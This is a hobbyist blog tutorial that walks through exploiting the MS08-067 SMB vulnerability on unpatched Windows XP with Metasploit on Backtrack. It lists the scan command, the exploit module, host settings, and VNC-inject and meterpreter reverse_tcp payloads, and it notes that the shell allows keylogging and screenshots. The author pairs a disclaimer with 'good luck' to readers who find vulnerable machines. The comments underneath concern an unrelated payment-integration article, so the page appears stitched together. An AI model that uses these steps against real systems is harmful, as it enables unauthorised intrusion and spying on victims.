Hacking a Windows PC with Metasploit on Backtrack

Hello guys, in this article, I’ll show you how to hack vulnerable windows XP/Server 2003 PC with Metasploit on Backtrack.

Here I assume you are already familiar with Backtrack or you already have one installed on your PC or virtual machine. If you don’t have one yet, or are not familiar with Backtrack or Metasploit you can find out about it and download it here http://www.backtrack-linux.org/.

Anyway, Metasploit was originally written in Perl, but later it was re-written in ruby, it’s basically a large database of exploit code, scanners, encoders and payloads. To know more about Metasploit visit the official website here http://www.metasploit.com/ . There is also a version for those that love windows too, so you can use it on your windows PC. I hate windows!

Ok, here is my Metasploit terminal; I assume you know how to get there already because it’s not really a tutorial for beginners.

Anyway, if you don’t still know how to get there, here it is, remember I’m using Backtrack Linux, on windows is easier.

Here is the exploit we are going to use “ms08_067_netapi”. I recommend using Metasploit on Linux or at least a Linux virtual machine, the windows version isn’t that cool.

Once we have Metasploit fired up, we type this:
nmap -sS -Pn -A or nmap -sS -Pn -A to scan more than one PC on the network.

The IP address above is the local address of the windows machine I’m scanning, this command is used for “port-scanning” your local area network to find live hosts , and report the number of open ports and the services (DAEMONS) running on them. Basically you should find SMB enabled on most of those PC’s.

After we find the machine, we run:
set RHOST we set the IP address of the remote host (our windows PC)
set LHOST we set the IP address of our current Linux PC
set THREADS 100 this is the thread value
use windows/smb/ms08_067_netapi This is the exploit we are using. SMB is used for file sharing on Windows and it has a vulnerability that we want to exploit.

Here is how it looks:

At this point, we use the show payloads command to get a list of suitable payloads.

Here I’m going to use a Reflective VNC injection as my payload. Next type:
set PAYLOAD windows/vncinject/bind_tcp and we are all set to attack!

Next type in exploit and let’s see what happens.

Remember, you can still use other payloads too e.g. I used set PAYLOAD windows/meterpreter/reverse_tcp to have access to the PC’s command shell. You can reboot the computer, shutdown, get the system info and do other stuffs like taking the screenshot and recording keystrokes too.

Hehehe… I luv this, just hacked my Windows XP on my virtual PC!

If the exploit succeeds, you will get a VNC session, but if it doesn’t exist, it means the Windows PC has been patched, most likely windows XP SP1 or 2 should work, but I don’t think it will on SP3.

So get an old Windows XP PC and try the exploit on it as I did with my old windows XP SP1 on VMWare. With this tutorial, you should be able to exploit other vulnerabilities on windows 7, vista etc with Metasploit.

To find out the latest vulnerabilities on windows and how to exploit them, visit http://web.nvd.nist.gov/view/vuln/search or http://www.exploit-db.com/.

Remember, this is just a tutorial, do not use it on someone’s PC and I’m not responsible for anything that happens if you try. Anyway, I’m not too sure you will find so many people still using Windows XP SP1 but if you find, good luck to you.

This bug has been fixed a long time ago by Microsoft http://technet.microsoft.com/en-us/security/bulletin/ms08-067.

I write codes... web, mobile, desktop and hack stuffs

0 Responses
  • shola daniels
    Sep 12, 2012

    I’m using wp-ecommerce plug-in in
    wordpress.I sure it’ll work too

    shola daniels Sep 12, 2012
    • neyo
      Sep 13, 2012

      Yes as long as you can get the required parameters…you will need to modify the plugin though.

      neyo Sep 13, 2012
  • shola daniels
    Sep 12, 2012

    Has anyone tried the integration in wordpress

    shola daniels Sep 12, 2012
  • Fresh
    Nov 22, 2012

    You are doing a fantastic job Tunde. Keep it up

    Fresh Nov 22, 2012
  • pete
    Feb 4, 2013

    Thank you mr tunde you are the best. Keep it up bro

    pete Feb 4, 2013
  • Cyril
    Mar 15, 2013

    Nice work. I really appreciate it. How about the part 2

    Cyril Mar 15, 2013
  • May 31, 2013

    Hello bro, please how do I integrate interswitch into a hotel website in wordpress?

    Otobong Colby May 31, 2013
  • FunmiOgunlesi
    Jul 23, 2013

    You dont mention generating a hash?
    Im sure that the Interswitch website said we had to generate a hash…

    FunmiOgunlesi Jul 23, 2013
  • Jul 23, 2013

    It’s great what you’ve done here Tunde. Gratitute

    Udeze 'Kene Jul 23, 2013

Leave a Reply

Your email address will not be published. Required fields are marked *